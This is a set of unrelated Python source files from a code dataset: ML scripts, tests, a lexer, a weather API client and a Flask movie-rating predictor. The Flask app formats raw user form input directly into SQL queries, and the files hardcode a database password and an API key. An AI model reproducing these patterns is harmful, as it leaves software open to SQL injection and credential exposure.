预期结果\n'''.format(**r)\n dic={}\n if \"=\" in data and method==\"GET\" and len(dic) == 0:\n req += \" params={}\\n\".format(str_to_dic(data))\n dic[\"params\"]=None\n elif(\"=\" in data and method==\"POST\" and len(dic) == 0):\n req += \" data={}\\n\".format(str_to_dic(data))\n kk = re.compile(\"'Content-Type': '(.*?)'\")\n tt = kk.findall(req)\n print(tt)\n if(len(tt) == 1):\n b = \"'Content-Type': '{}'\".format(tt[0])\n req = req.replace(b,\"'Content-Type': 'application/x-www-form-urlencoded'\")\n dic[\"data\"] = None\n\n try:\n s = json.loads(request_content)\n req += \" json_data='''{}'''\\n\".format(request_content)\n dic[\"json_data\"] = None\n except:\n if \"=\" in request_content and len(dic) == 0:\n req += \" data={}\\n\".format(str_to_dic(request_content))\n dic[\"data\"] = None\n elif len(dic) == 0:\n req += \" data='''{}'''\\n\".format(request_content)\n dic[\"data\"] = None\n\n\n\n a = '''\n # --------------------分界线,下边的不要修改-----------------------------------------\n # method,pub_data和url为必传字段\n r = request_tool.request(method=method,url=uri,pub_data=pub_data,status_code=status_code,headers=headers,expect=expect,feature=feature,story=story,title=title'''\n req += a\n for d in dic:\n req += \",{}={}\".format(d,d)\n req += \")\"\n print(r)\n with open(\"demo.txt\",\"w\") as f:\n f.write(req)\n\n print(req)\n\nif __name__ == '__main__':\n make_code()\n\n","sub_path":"make_demo.py","file_name":"make_demo.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"562719465","text":"# -*- coding: latin-1 -*-\n#função para fazer grelha a duas dimensões\n# G=mkgrid2d(xgrid,ygrid)\n# Entradas: xgrid e ygrid \n# arrays com os espaçamentos desejados no x e y\n# Saídas: G -> array de 2xN\n# N é nº total de pontos na grelha \n# Exemplo:\n# g1=np.arange(-1.,1.25,.25)\n# g2=np.arange(-2.,2.5,.5)\n# G=mkgrid2d(g1,g2)\nimport numpy as np\ndef mkgrid2d(xGrid,yGrid):\n X,Y=np.meshgrid(xGrid,yGrid)\n c=len(xGrid)\n r=len(yGrid)\n Xt=X.copy()\n for i in np.arange(0,r,2):\n Xt[i,:]=Xt[i,np.arange(c-1,-1,-1)] \n \n \n x1=Xt.flatten()\n x2=X.T.flatten()\n x=np.hstack((x2,x1))\n\n Yt=Y.copy()\n for i in np.arange(1,c,2):\n Y[:,i]=Y[np.arange(r-1,-1,-1),i]\n \n y1=Y.T.flatten()\n y2=Yt.flatten()\n y=np.hstack((y1,y2))\n\n G=np.vstack((x,y))\n #print G.shape\n return G\n\n","sub_path":"AA/materia/ficha 1/mkgrid2d.py","file_name":"mkgrid2d.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"165590912","text":"# import os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\nimport cv2\nimport numpy as np \nfrom Detectors.YoloOpencvDetector import YoloOpencvDetector\nfrom Detectors import Utils \nimport time\n# detector = YoloOpencvDetector(\"./Detectors/YOLO/yolov3.cfg\", \"./Detectors/YOLO/yolov3_320.weights\")\n# detector = YoloOpencvDetector(\"./Detectors/YOLO/yolov3.cfg\", \"./Detectors/YOLO/yolov3.weights\")\n# detector = YoloOpencvDetector(\"./Detectors/YOLO/yolov3.cfg\", \"./Detectors/YOLO/yolov3.weights\")\n# detector = YoloOpencvDetector(\"./Detectors/YOLO/yolov2-voc.cfg\", \"./Detectors/YOLO/yolov2-voc.weights\")\ndetector = YoloOpencvDetector(\"./Detectors/YOLO/signs/yolov3_cfg.cfg\", \"./Detectors/YOLO/signs/yolov3_cfg_8800.weights\", CLASSESPath=\"./signs.names\")\n# cap = cv2.VideoCapture(\"/home/vasily/Downloads/DJI_0002.MP4\")\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, int(640))\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, int(480))\n# out = cv2.VideoWriter()\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter('output_3.avi',fourcc, 28.0, (640,480))\nframe_i = 0\ntime.sleep(1)\nwhile True:\n ret, frame = cap.read()\n if ret == False:\n break\n if 0 == 0:\n \n # frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n # boxes, classIDs, confidences = detector.detect(frame, s=(320, 320))\n boxes, classIDs, confidences = detector.detect(frame, s=(320, 320))\n # boxes, classIDs, confidences = detector.detect(frame, s=(416, 416))\n # boxes, classIDs, confidences = detector.detect(frame, s=(608, 608))\n # boxes, classIDs, confidences = detector.detect(frame, s=(700, 700))\n frame = Utils.draw_boxes(frame, boxes, classIDs, confidences, detector.CLASSES, COLORS=detector.COLORS)\n out.write(frame)\n cv2.imshow(\"frame\", frame)\n \n if cv2.waitKey(1) == ord('q'):\n break\n frame_i +=1 \ncap.release()\nout.release()","sub_path":"src/ObjectDetection/obj_detectors/test_detectors.py","file_name":"test_detectors.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481696159","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_utils\n----------------------------------\n\nTests for `sqlalchemy_test_cache.utils` module.\n\"\"\"\nfrom __future__ import unicode_literals\n\nimport collections\nimport contextlib\nimport os\nimport tempfile\nimport unittest\ntry:\n from unittest import mock\nexcept ImportError: # python2\n import mock # noqa\n\nfrom sqlalchemy_test_cache import utils\n\n\nFakeDialect = collections.namedtuple('FakeDialect', 'statement_compiler')\nFakeStatementCompiler = collections.namedtuple('FakeStatementCompiler', '')\n\n\n@contextlib.contextmanager\ndef create_tmp_file(content, name):\n\n _tempfile = '{}/{}'.format(tempfile.gettempdir(), name)\n\n try:\n with open(_tempfile, 'w') as f:\n f.write(content)\n\n yield\n finally:\n os.unlink(_tempfile)\n\n\nclass GenerateValueLiteralCompilerTestCase(unittest.TestCase):\n\n def test_ensure_compiler_uses_dialect_statement_compiler(self):\n\n dialect = FakeDialect(statement_compiler=FakeStatementCompiler)\n\n qlc = utils.generate_value_literal_compiler(dialect)\n\n self.assertTrue(issubclass(qlc, FakeStatementCompiler))\n\n\nclass GenerateDumpPathTestCase(unittest.TestCase):\n\n def test_generate_path_with_default_base_dir(self):\n\n dump_path = utils.generate_dump_path('ClassName', 123456789)\n\n basedir = tempfile.gettempdir()\n\n self.assertEqual('{}/ClassName-123456789.dump'.format(basedir), dump_path)\n\n def test_exception_when_basedir_is_not_none_but_use_tmp_is_true(self):\n\n with self.assertRaises(ValueError) as cm:\n utils.generate_dump_path('ClassName', 123456789, use_tmp=True, basedir='/base/dir')\n\n exception = cm.exception\n\n expected_message = 'To use the basedir {!r}, you must set the parameter {!r} as {!r}.'.format(\n '/base/dir', 'use_tmp', False\n )\n\n self.assertEqual(str(exception), expected_message)\n\n def test_exception_when_use_tmp_is_false_but_basedir_is_none(self):\n\n with self.assertRaises(ValueError) as cm:\n utils.generate_dump_path('ClassName', 123456789, use_tmp=False)\n\n exception = cm.exception\n\n expected_message = 'As the parameter {!r} is {!r}, you need to inform a basedir'.format(\n 'use_tmp', False\n )\n\n self.assertEqual(str(exception), expected_message)\n\n def test_generate_path_when_basedir_is_not_none(self):\n\n dump_path = utils.generate_dump_path('ClassName', 123456789, use_tmp=False, basedir='/foobar')\n\n self.assertEqual(dump_path, '/foobar/ClassName-123456789.dump')\n\n\nclass LoadDumpDataFromFileTestCase(unittest.TestCase):\n\n def test_exception_when_dump_file_path_does_not_exists(self):\n\n with self.assertRaises(IOError) as cm:\n list(utils.load_dump_data_from_file('foobarbleh'))\n\n exception = cm.exception\n\n expected_message = '[Errno 2] No such file or directory: {!r}'.format('foobarbleh')\n\n self.assertEqual(expected_message, str(exception))\n\n def test_load_data(self):\n\n with create_tmp_file(content='INSERT INTO...\\n', name='ClassName-123456789.dump'):\n\n dump_data = list(utils.load_dump_data_from_file('/tmp/ClassName-123456789.dump'))\n\n self.assertListEqual(['INSERT INTO...\\n'], dump_data)\n\n\nclass WriteDumpToFileTestCase(unittest.TestCase):\n\n def wite_dump_data(self):\n\n dump_data = '\\n'.join(['INSERT INTO \"\" ...', 'INSERT INTO \"\" ...', 'INSERT INTO \"\" ...'])\n\n dump_file_path = tempfile.NamedTemporaryFile().name\n\n utils.write_dump_data_to_file(dump_file_path, dump_data)\n\n self.assertListEqual(\n list(line.strip() for line in utils.load_dump_data_from_file(dump_file_path)),\n dump_data.split('\\n')\n )\n","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326408979","text":"__author__ = 'xiangyu'\n\n\ndef addXOROR(camOut, oraOut, startIndex1, startindex2):\n xorInt = startindex2\n cnFile = []\n i = 0\n for po in camOut:\n xorInt += 1\n sig1 = po\n sig2 = oraOut[i]\n i+=1\n poConsLine1 = '-'+str(sig1)+' -'+str(sig2)+' -'+str(xorInt)+' 0\\n'\n cnFile.append(poConsLine1)\n poConsLine2 = str(sig1)+' '+str(sig2)+' -'+str(xorInt)+' 0\\n'\n cnFile.append(poConsLine2)\n poConsLine3 = str(sig1)+' -'+str(sig2)+' '+str(xorInt)+' 0\\n'\n cnFile.append(poConsLine3)\n poConsLine4 = '-'+str(sig1)+' '+str(sig2)+' '+str(xorInt)+' 0\\n'\n cnFile.append(poConsLine4)\n\n orIndex = xorInt+1\n orLine = ''\n for xorInt in range(startindex2+1, orIndex):\n orLine += str(xorInt)+' '\n orLine += '-' + str(orIndex)+' 0\\n'\n cnFile.append(orLine)\n orLine1 = ''\n for xorInt in range(startindex2+1, orIndex):\n orLine1= '-'+str(xorInt)+' ' + str(orIndex)+' 0\\n'\n cnFile.append(orLine1)\n cnFile.append(str(orIndex) + ' 0\\n')\n # line = 'This is generated for XORAND\\n'\n # cnFile.append((line))\n\n return cnFile, orIndex\n","sub_path":"Mix/c880/method_XOROR.py","file_name":"method_XOROR.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"438979422","text":"# third\r\nimport pprint\r\nimport sqlite3\r\nfrom flask import g\r\nimport config\r\n\r\nDATABASE = config.DB_PATH\r\n\r\n\r\nclass Database:\r\n\r\n #----------\r\n # __init__\r\n #----------\r\n def __init__(self):\r\n\r\n # self.response = {}\r\n self.response = {}\r\n\r\n\r\n #----------\r\n # get_db()\r\n #----------\r\n def get_db(self):\r\n\r\n db = getattr(g, '_database', None)\r\n if db is None:\r\n db = g._database = sqlite3.connect(DATABASE)\r\n return db \r\n\r\n\r\n #----------\r\n # query_db()\r\n #----------\r\n def query_db(self, query, args=(), one=False):\r\n\r\n cur = self.get_db().execute(query, args)\r\n self.get_db().commit()\r\n rv = cur.fetchall()\r\n cur.close()\r\n return (rv[0] if rv else None) if one else rv\r\n # return rv\r\n\r\n #----------\r\n # query_db()\r\n #----------\r\n def query_db2(self, query, args=(), one=False):\r\n\r\n cur = self.get_db().execute(query, args)\r\n self.get_db().commit()\r\n rv = cur.fetchall()\r\n result = rv[0][0]\r\n cur.close()\r\n return result\r\n\r\n def init(self):\r\n query = \"\"\" CREATE TABLE IF NOT EXISTS category (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n category text NOT NULL,\r\n status int NOT NULL\r\n );\r\n\r\n CREATE TABLE IF NOT EXISTS client (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n name text NOT NULL,\r\n mail text NOT NULL,\r\n cellphone text NOT NULL,\r\n birthday date NOT NULL,\r\n dni text NOT NULL,\r\n status int NOT NULL\r\n );\r\n\r\n CREATE TABLE IF NOT EXISTS product (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n category int NOT NULL,\r\n name text NOT NULL,\r\n stock int NOT NULL,\r\n stock_limit int NOT NULL,\r\n input_date date NOT NULL,\r\n buy_price float NOT NULL,\r\n sale_price float NOT NULL,\r\n photo text NOT NULL,\r\n status int NOT NULL\r\n );\r\n\r\n CREATE TABLE IF NOT EXISTS user (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n name text NOT NULL,\r\n lastname text NOT NULL,\r\n mail text NOT NULL,\r\n pass text NOT NULL,\r\n profile int NOT NULL,\r\n status int NOT NULL\r\n );\r\n\r\n CREATE TABLE IF NOT EXISTS sale (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n productId int NOT NULL,\r\n quantity int NOT NULL,\r\n sale_date date not null,\r\n total float not null,\r\n status int NOT NULL\r\n );\r\n \"\"\"\r\n cur = self.get_db().executescript(query)\r\n self.get_db().commit()","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526921719","text":"import ply.lex as lex\nimport re\nimport codecs\nimport os\nimport sys\n\nkeywords = [\n 'INTEGER', 'REAL',\n\n 'READ', 'WRITE', 'FORMAT',\n 'END', 'STOP',\n 'CALL', 'CONTINUE',\n 'DO',\n 'PAUSE',\n\n 'IF',\n\n \t]\n\ntokens = keywords + [\n 'POWER', 'RPAREN','LPAREN', 'TIMES', 'MINUS',\n 'PLUS','COMMA','DIVIDE',\n # Operadores logicos\n 'LT', 'LE', 'GT', 'GE', 'EQ','GTE','LTE','NE',\n\n # Literales\n\n 'ID', 'GOTO','AND','OR','NOT'\n ]\n\nliterals = '+-*/(),**'\n\nt_ignore = '\\t | \\r'\nt_PLUS = r'\\+'\nt_MINUS = r'\\-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_POWER = r'\\*\\*'\n#t_ODD = r'ODD'###\n\nt_NE = r'<>'\nt_LT = r'<'\nt_LTE = r'<='\nt_GT = r'>'\nt_GTE = r'>='\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_COMMA = r','\n\nt_INTEGER = r'\\d+'\nt_REAL = r'\\d+\\.\\d*(E[-+]?[1-9][0-9]?)?'\nt_GOTO = r'GO\\s?TO'\n\n# Ignorar Comentarios\ndef t_comment( t):\n r'C.*'\n pass\n\n# Constantes Reales\ndef t_RCONST( t):\n r'\\d+\\.\\d*(E[-+]?[1-9][0-9]?)?'\n t.value = float(t.value)\n return t\n\n# Constantes Enteras\ndef t_ICONST( t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n# Regla para identificadores\ndef t_ID( t):\n r'[A-Z][A-Z0-9]*'\n if t.value in keywords:\n t.type = t.value\n return t\n\n# Regla para seguimiento a las lineas\ndef t_newline( t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n# Manejo de errores\ndef t_error( t):\n print(\"Caracter ilegal '%s'\" % t.value[0])\n t.lexer.skip(1)\n\n\n\n\n\nanalizador = lex.lex()\n","sub_path":"lexer5.py","file_name":"lexer5.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"325187856","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nimport scipy.cluster.hierarchy as sch\r\nfrom scipy.spatial.distance import cdist\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.metrics import silhouette_samples, silhouette_score\r\n\r\n# Displays an elbow graph of the data. From it you should be able to see where the optimal number\r\n# of clusters is.\r\ndef elbow(X):\r\n distortions = []\r\n K = range (1, 36)\r\n for k in K:\r\n kmeanModel = KMeans(n_clusters=k).fit(X)\r\n kmeanModel.fit(X)\r\n distortions.append(sum(np.min(cdist(X, kmeanModel.cluster_centers_, 'euclidean'), axis=1)) / X.shape[0])\r\n \r\n plt.plot(K, distortions, 'bx-')\r\n plt.xlabel('k')\r\n plt.ylabel('Distortion')\r\n plt.title(\"The Elbow Method showing the optimal k\")\r\n plt.show()\r\n print(\"leaving elbow\")\r\n \r\n\r\n# Display a silhouette graph of the data. It is supposed to help you learn where the optimal number of\r\n# clusters is.\r\ndef silhouette(X): \r\n range_n_clusters = [11,12,13,14,15,16,17,18,19,20,21,22,23,24]\r\n for n_clusters in range_n_clusters:\r\n # Create a subplot with 1 row and 2 columns\r\n fig, (ax1, ax2) = plt.subplots(1,2)\r\n fig.set_size_inches(18,7)\r\n \r\n # The 1st subplot is the silhouette plot\r\n # The silhouette coefficient can range from -1, 1 but in this xaple all\r\n # lie within \r\n ax1.set_xlim([-1, 1])\r\n \r\n# ax1.set_ylim([(0, X[:,0] + n_clusters + 1) * 10])\r\n \r\n clusterer = KMeans(n_clusters=n_clusters, random_state=0)\r\n cluster_labels = clusterer.fit_predict(X)\r\n \r\n silhouette_avg = silhouette_score(X, cluster_labels)\r\n print(\"For n-clusers =\", n_clusters,\"The average silhouette_score is :\", silhouette_avg)\r\n \r\n sample_silhouette_values = silhouette_samples(X, cluster_labels, metric='euclidean')\r\n y_lower = 10\r\n yticks = []\r\n for i in range(n_clusters):\r\n ith_cluster_silhouette_values = sample_silhouette_values[cluster_labels ==i]\r\n ith_cluster_silhouette_values.sort()\r\n size_cluster_i = ith_cluster_silhouette_values.shape[0]\r\n y_upper = y_lower + size_cluster_i\r\n color = cm.nipy_spectral(float(i) / n_clusters)\r\n ax1.fill_betweenx(np.arange(y_lower, y_upper),\r\n 0, ith_cluster_silhouette_values,\r\n facecolor=color, edgecolor=color, alpha=0.7)\r\n ax1.text(-0.05,y_lower + 0.5 * size_cluster_i, str(i))\r\n \r\n y_lower = y_upper + 10\r\n \r\n ax1.set_title(\"The silhouette plot for the various lusters.\")\r\n ax1.set_xlabel(\"The silhouete coefficien values\")\r\n ax1.set_ylabel(\"Cluster label\")\r\n \r\n ax1.set_yticks([])\r\n ax1.set_xticks([-1.0, -.8, -.6, -.4, -.2, 0, 0.2, 0.4, 0.6, 0.8, 1])\r\n colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)\r\n ax2.scatter(X[:, 0], X[:, 1], marker = '.', s=30, lw=0, alpha=0.7,\r\n c=colors, edgecolor='k')\r\n \r\n centers = clusterer.cluster_centers_\r\n \r\n ax2.scatter(centers[:, 0], centers[:,1], marker='o',c=\"white\", alpha=1, s=200, edgecolor = 'k')\r\n for i, c in enumerate(centers):\r\n ax2.scatter(c[0], c[1], marker='$%d$' %i, alpha=1,s=50, edgecolor='k')\r\n \r\n ax2.set_title(\"The visualization of the clustered data.\")\r\n ax2.set_xlabel(\"Feature space for the 1st feature\")\r\n ax2.set_ylabel(\"Feature space for the 2nd feature\")\r\n \r\n plt.suptitle((\"Silhouette analysis for KMeans lusteringon sample data \"\r\n \"with N_clusters = %d\" % n_clusters),fontsize=14, fontweight = 'bold')\r\n\r\n plt.show()\r\n\r\n\r\ndef dendrogram(X):\r\n dendrogram = sch.dendrogram(sch.linkage(X, method='ward'))","sub_path":"ml_baseline/shared_modules/kmeans_graph_utils.py","file_name":"kmeans_graph_utils.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"516492203","text":"import urllib.request\nimport json\n\nclass WeatherData:\n \n api_key = '7e95614bcf837210'\n temperature = ''\n weather_conditions = ''\n wind_speed = ''\n city = ''\n \n url_data={\n 'Toronto':['zmw:00000.176.71508.json'],\n 'Montreal':['canada/Montreal.json'],\n 'Vancouver':['canada/Vancouver.json'],\n 'New York':['NY/New_York.json'],\n 'Los Angeles':['CA/Los_Angeles.json'],\n 'London':['UK/London.json'],\n 'Mumbai':['india/Mumbai.json'],\n 'Paris':['fr/paris.json'],\n 'test':['cd/kinshasa.json']\n }\n \n def __init__(self, city):\n self.city = city\n request = urllib.request.urlopen(\"http://api.wunderground.com/api/\" +\n self.api_key +\n \"/conditions/q/\" +\n self.url_data[self.city][0])\n \n json_string = request.read()\n \n parse_json = json.loads(json_string.decode('utf-8'))\n self.temperature = parse_json['current_observation']['temp_c']\n self.weather_conditions = parse_json['current_observation']['weather']\n self.wind_speed = parse_json['current_observation']['wind_kph']\n \n \n def getServoValue(self):\n temp_factor = (self.temperature*100)/30\n wind_factor = (self.temperature*100)/20\n servo_value = temp_factor-(wind_factor/20)\n \n if(servo_value >= 100):\n return 100\n elif (servo_value <= 0):\n return 0\n else:\n return servo_value\n \n def getLEDValue(self):\n if (self.weather_conditions=='Thunderstorm'):\n return 2;\n elif(self.weather_conditions=='Raining'):\n return 1\n else:\n return 0\n \nif __name__==\"__main__\":\n \n weather = WeatherData('Paris')\n print(weather.getServoValue())\n print(weather.getLEDValue())\n\n \n \n \n \n \n\n\n \n\n ","sub_path":"Chapter 6/Code/WeatherData.py","file_name":"WeatherData.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377849886","text":"from unittest.mock import patch\nfrom maintain_frontend.dependencies.session_api.session import Session\n\n\nclass Utilities(object):\n \"\"\"Helper class that mocks out the session for test making app requests.\n\n\n Supports both unittest framework and flasktest framework.\n\n Place in test set up Utilities.mock_session_cookie_unittest(self)\n\n or\n\n Utilities.mock_session_cookie_flask_test(self)\n \"\"\"\n\n @staticmethod\n def mock_session_cookie_unittest(unittest):\n patcher = patch('maintain_frontend.app.Session')\n unittest.addCleanup(patcher.stop)\n unittest.mock_session = patcher.start()\n unittest.app.set_cookie('localhost', Session.session_cookie_name, 'cookie_value')\n unittest.mock_session.return_value.valid.return_value = True\n unittest.mock_session.session_cookie_name = Session.session_cookie_name\n\n @staticmethod\n def mock_session_cookie_flask_test(flasktest):\n patcher = patch('maintain_frontend.app.Session')\n flasktest.mock_session = patcher.start()\n flasktest.mock_session.return_value.valid.return_value = True\n flasktest.mock_session.session_cookie_name = Session.session_cookie_name\n","sub_path":"unit_tests/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356829848","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport psycopg2\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom flask import Flask, Response, render_template, request, jsonify\n\napp = Flask(__name__)\napp.debug = True\ndbname = 'movie'\nusername = 'trevor'\n\n# Filenames for loaded lists of data for prediction objects from machine learning algorithm\ncritic_filename = os.path.join('CriticForestNew3.sav')\naudience_filename = os.path.join('AudienceForestNew3.sav')\nbreakeven_filename = os.path.join('BreakevenForestNew3.sav')\n# Loading data using filenames defined above placed in joblib.load()\ncritic_predictor = joblib.load(critic_filename)\naudience_predictor = joblib.load(audience_filename)\nbreakeven_predictor = joblib.load(breakeven_filename)\n\n# Takes output of critic and audience tomatometer predictions and creates string equivalents for insertion into HTML text\ndef FreshPredict(prediction_data, predict_object):\n prediction = int(predict_object.predict(prediction_data))\n if prediction == 1:\n return 'fresh'\n else:\n return 'rotten'\n\n# Binarizes output of Critic (and audience) tomatometer prediction algorithm for input into gross profit breakeven prediction algorithm\ndef CriticVariable(FreshPredictOutput):\n if FreshPredictOutput == 'fresh':\n return 1\n else:\n return 0\n\n# Takes output of breakeven prediction and creates string equivalents for insertion into HTML text\ndef BreakevenPredict(prediction_data, predict_object):\n prediction = int(predict_object.predict(prediction_data))\n if prediction == 1:\n return 'will'\n else:\n return 'will not'\n\n# Takes output of breakeven prediction and creates input for insertion into ProbabilityMaker function\ndef BreakevenVariable(FreshPredictOutput):\n if FreshPredictOutput == 'will':\n return 1\n else:\n return 0\n\n# Output random forest probabilities given the prediction data and object\ndef ProbabilityMaker(prediction_data, prediction_object, prediction_made):\n b = prediction_object.predict_proba(prediction_data)\n if prediction_made == 1:\n return (\"%0.2f\" % (float(b[:,1]) * 100))\n else:\n return (\"%0.2f\" % (float(b[:,0]) * 100))\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/index',methods=['GET','POST'])\ndef indexsearch():\n try:\n if request.method =='POST':\n connector = psycopg2.connect(dbname='movie', user='trevor', host='localhost', password='password')\n cursor = connector.cursor()\n # Putting user-input web form data into variables\n dName_input = request.form['director']\n #dForm = SearchForm(dName_input)\n #dName_input = SearchForm(request.form['director'])\n aName_input = request.form['actor']\n genre_input = request.form['genre']\n location1_input = request.form['country']\n location2_input = request.form['state']\n production_input = request.form['production']\n runtime_input = int(request.form['runtime'])\n budget_input = int(request.form['budget'])\n # SQL queries to match user input with label encoding for prediction\n dn_qry = (\"\"\"select \"dN\" FROM movie WHERE \"dName\" = '%s';\"\"\" % dName_input)\n cursor.execute(dn_qry, dName_input)\n director = cursor.fetchall()\n an_qry = (\"\"\"select \"aN\" FROM movie WHERE \"aName\" = '%s';\"\"\" % aName_input)\n cursor.execute(an_qry, aName_input)\n actor = cursor.fetchall()\n l1_qry = (\"\"\"select \"l1\" FROM movie WHERE \"location1\" = '%s';\"\"\" % location1_input)\n cursor.execute(l1_qry, location1_input)\n country = cursor.fetchall()\n l2_qry = (\"\"\"select \"l2\" FROM movie WHERE \"location2\" = '%s';\"\"\" % location2_input)\n cursor.execute(l2_qry, location2_input)\n state = cursor.fetchall()\n ge_qry = (\"\"\"select \"ge\" FROM movie WHERE \"genre\" = '%s';\"\"\" % genre_input)\n cursor.execute(ge_qry, genre_input)\n genre = cursor.fetchall()\n f1_qry = (\"\"\"select \"f1\" FROM movie WHERE \"first_production_company\" = '%s';\"\"\" % production_input)\n cursor.execute(f1_qry, production_input)\n production = cursor.fetchall()\n critic_prediction_data = pd.DataFrame({'dN' : [(\"%s\"%director[0])], 'aN' : [(\"%s\"%actor[0])], 'l1' : [(\"%s\"%country[0])], 'l2' : [(\"%s\"%state[0])],\n 'ge' : [(\"%s\"%genre[0])], 'f1' : [(\"%s\"%production[0])], 'runtime' : [int(runtime_input)], 'budget' : [int(budget_input)]})\n Critic_result = str(FreshPredict(critic_prediction_data, critic_predictor))\n BreakevenCriticVar = CriticVariable(Critic_result)\n Critic_percent = ProbabilityMaker(critic_prediction_data, critic_predictor, CriticVariable(Critic_result))\n # Audience\n Audience_result = str(FreshPredict(critic_prediction_data, audience_predictor))\n BreakevenAudienceVar = CriticVariable(Audience_result)\n Audience_percent = ProbabilityMaker(critic_prediction_data, audience_predictor, CriticVariable(Audience_result))\n # DataFrame to hold label codes matching user input and the predicted rating for 'fresh' or 'rotten'\n breakeven_prediction_data = pd.DataFrame({'dN' : [(\"%s\"%director[0])], 'aN' : [(\"%s\"%actor[0])], 'l1' : [(\"%s\"%country[0])], 'l2' : [(\"%s\"%state[0])],\n 'ge' : [(\"%s\"%genre[0])], 'f1' : [(\"%s\"%production[0])], 'runtime' : [int(runtime_input)], 'budget' : [int(budget_input)], 'C1' : [int(BreakevenCriticVar)], 'A1' : [int(BreakevenAudienceVar)]})\n ## Predictions for breakeven based on user input and predicted freshness\n Breakeven_result = str(BreakevenPredict(breakeven_prediction_data, breakeven_predictor))\n # Outputting predictions to results.html\n Breakeven_percent = ProbabilityMaker(breakeven_prediction_data, breakeven_predictor, BreakevenVariable(Breakeven_result))\n connector.close()\n return render_template(\"results.html\", Critic_result = Critic_result, Critic_percent = Critic_percent, Audience_result = Audience_result, Audience_percent = Audience_percent, Breakeven_result = Breakeven_result, Breakeven_percent = Breakeven_percent)\n except Exception as e:\n print(type(e))\n print(e)\n print(\"Unable to load the main web page.\")\n\nif __name__ == '__main__':\n# The arguments in this app.run() call permit you to make changes and reload the web page without restarting the server.\n #app.run (host = os.getenv('IP', '0.0.0.0'), port = int(os.getenv('PORT', 5000)), debug = True)\n app.debug = True\n app.run (host = '0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"592194402","text":"#encoding: utf8\n\nfrom common.utils.flask import register_api\nfrom . import controllers as ctrl, api\n\nurls = [\n (ctrl.LoginController, \"login\", \"/login/\"),\n (ctrl.NewsController, \"news\", \"/news/\"),\n (ctrl.NewsReportController, \"news.report\", \n \"/news//report/\", False),\n (ctrl.RegisterController, \"register\", \"/register/\"),\n\n]\n\nfor url in urls:\n register_api(api, *url)","sub_path":"api/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319611862","text":"from django.urls import path\nfrom . import views\n\n\n\nurlpatterns = [\n path('creat_an_account/' , views.register , name='register'),\n path('login' , views.login , name='login'),\n path('logout' , views.logoutView , name='logout'),\n path('dashboard' , views.dashboard , name='dashboard'),\n] \n\n\n","sub_path":"web_project/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426286463","text":"from __future__ import absolute_import \nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom my_model import MyModel, DataLoader\nimport time\nimport logging\nimport sys\nimport math\n\nimport tensorflow as tf \n\nlogging.basicConfig(format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n\t\t\t\t\tlevel = logging.DEBUG, \n\t\t\t\t\tstream = sys.stdout)\n\nMODEL_PATH = './model/model.ckpt'\nSUMMARY_PATH = './logs/'\n\nNUM_CLASSES = ord('z') - ord('a') + 1 + 1 + 1\nNUM_EPOCHS = 200\nLST_NUM_HIDDEN = [100, 100, 200, 200]\nNUM_LAYERS = 